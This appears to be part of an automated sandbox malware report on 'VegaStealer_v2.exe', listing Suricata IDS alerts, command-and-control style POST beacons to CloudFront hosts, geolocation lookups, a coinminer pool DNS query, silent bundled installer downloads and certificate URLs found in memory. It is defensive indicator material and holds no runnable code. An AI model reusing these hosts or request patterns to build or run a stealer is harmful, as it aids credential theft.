                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49726 -> 65.9.108.148:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 13.226.4.166:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49766 -> 13.226.4.166:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49720 -> 13.226.4.166:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49749 -> 13.226.4.166:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49737 -> 13.226.4.166:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49778 -> 13.226.4.166:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49759 -> 65.9.108.148:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49793 -> 65.9.108.148:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49784 -> 65.9.108.148:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 65.9.108.148:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49743 -> 65.9.108.148:443
                                  Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.5:58867 -> 1.1.1.1:53
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49772 -> 65.9.108.148:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49838 -> 65.9.108.93:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49849 -> 65.9.108.93:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49873 -> 18.66.161.123:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49891 -> 54.186.212.229:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49887 -> 65.9.108.93:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49900 -> 54.186.212.229:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49903 -> 65.9.108.93:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49913 -> 2.16.168.105:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49910 -> 2.16.168.105:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49896 -> 3.165.135.3:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49919 -> 65.9.108.93:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49911 -> 3.165.135.3:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49929 -> 2.16.168.105:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49921 -> 3.165.135.3:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49922 -> 54.186.212.229:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49936 -> 2.16.168.105:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49942 -> 2.16.168.105:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49951 -> 3.165.135.3:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49949 -> 2.16.168.115:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49943 -> 65.9.108.93:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49971 -> 54.186.212.229:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49964 -> 2.16.168.115:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49981 -> 2.16.168.115:443
                                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49957 -> 2.16.168.115:443
                                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50016 -> 104.20.94.94:443
                                  Source: global trafficHTTP traffic detected: POST /o HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 125Host: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 390Host: d31tu1fsc224h4.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 409Host: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 464Host: d31tu1fsc224h4.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 388Host: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 443Host: d31tu1fsc224h4.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 419Host: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 474Host: d31tu1fsc224h4.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 401Host: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 456Host: d31tu1fsc224h4.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 418Host: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 473Host: d31tu1fsc224h4.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 412Host: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 459Host: d31tu1fsc224h4.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 400Host: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 447Host: d31tu1fsc224h4.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 457Host: d31tu1fsc224h4.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST /zbd HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 357Host: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 416Host: d31tu1fsc224h4.cloudfront.net
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Host: ip-api.comConnection: Keep-Alive
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /f/WebAdvisor/images/943/EN.png HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficHTTP traffic detected: GET /f/WeatherZero/images/969/EN.png HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficHTTP traffic detected: GET /f/RAV_Triple_NCB/images/DOTPS-855/EN.png HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficHTTP traffic detected: GET /f/WebAdvisor/files/1489/saBSI.zip HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficHTTP traffic detected: GET /f/WeatherZero/files/969/WZSetup.zip HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficHTTP traffic detected: GET /rsStubActivator.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Inno Setup 6.2.2Host: shield.reasonsecurity.com
                                  Source: global trafficHTTP traffic detected: GET /ReasonLabs-Setup-Wizard.exe?dui=9e146be9-c76a-4720-bcdb-53011b87bd06&dit=20241228162010&is_silent=true&oc=ZB_RAV_Cross_Tri_NCB&p=cdc2&a=100&b=&se=true&oip=26&ptl=7&dta=true&pds=%5bepp%2cvpn%2cdns%5d HTTP/1.1Host: shield.reasonsecurity.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/?fields=61439 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/?fields=61439 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficDNS traffic detected: DNS query: freegeoip.app
                                  Source: global trafficDNS traffic detected: DNS query: ipbase.com
                                  Source: global trafficDNS traffic detected: DNS query: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                                  Source: global trafficDNS traffic detected: DNS query: d31tu1fsc224h4.cloudfront.net
                                  Source: global trafficDNS traffic detected: DNS query: shield.reasonsecurity.com
                                  Source: global trafficDNS traffic detected: DNS query: electron-shell.reasonsecurity.com
                                  Source: global trafficDNS traffic detected: DNS query: api.openweathermap.org
                                  Source: global trafficDNS traffic detected: DNS query: cheatengine.org
                                  Source: unknownHTTP traffic detected: POST /o HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 125Host: d34hwk9wxgk5fi.cloudfront.net
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Dec 2024 21:20:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 110082Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01JG7J81N4E6X2E12RP7G7B6GScf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7r0NPIuGsZ62nCmG%2B9T6%2BEJa%2Bvziov%2BnTwYxkAtEToRUQ4abL8%2BF8KwkL4G5621G0oN5enLCnKWm6e37Jg9og3KBJlnmk%2Fv6dSR5evPgEtTsJCxYDl%2BNNqdsbPm4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f9497aa783b334e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1818&rtt_var=697&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=678&delivery_rate=1553191&cwnd=173&unsent_bytes=0&cid=7087dacb525097ba&ts=478&x=0"
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2038592762.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.di
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3039818619.0000000004E2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2013422206.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2026508617.0000000002C74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crPl3.d
                                  Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                  Source: powershell.exe, 0000002B.00000002.2600381025.00000265D84D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mHHQ
                                  Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                                  Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
